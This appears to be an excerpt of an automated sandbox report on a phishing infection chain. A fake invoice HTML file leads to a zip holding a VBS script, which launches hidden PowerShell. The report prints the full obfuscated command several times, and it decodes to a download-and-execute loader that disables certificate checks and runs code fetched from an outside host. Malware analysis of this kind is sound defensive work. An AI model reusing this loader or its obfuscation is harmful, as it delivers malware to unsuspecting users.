Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwXZtAwej) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir5908_2091318380Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir5908_2091318380Jump to behavior
Source: classification engineClassification label: mal96.phis.expl.evad.winHTML@42/14@13/8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\85360e87-479f-4825-bc32-2f6ed42533c1.tmpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6376:120:WilError_03
Source: C:\Windows\SysWOW64\unarchiver.exeFile created: C:\Users\user\AppData\Local\Temp\unarchiver.logJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs"
Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2148,i,14000748609247893809,15602923536421620925,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2184 /prefetch:3
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\faktura_FV2025020637756.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\faktura_FV2025020637756.zip"
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab" "C:\Users\user\Downloads\faktura_FV2025020637756.zip"
Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwXZtAwej) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^|%{[char]($_/3)})-join'') ^| ^&($kwXZtAwej) "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2148,i,14000748609247893809,15602923536421620925,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2184 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\faktura_FV2025020637756.zip"Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab" "C:\Users\user\Downloads\faktura_FV2025020637756.zip"Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwXZtAwej) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^|%{[char]($_/3)})-join'') ^| ^&($kwXZtAwej) "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\7za.exeSection loaded: 7z.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior

Data Obfuscation

barindex
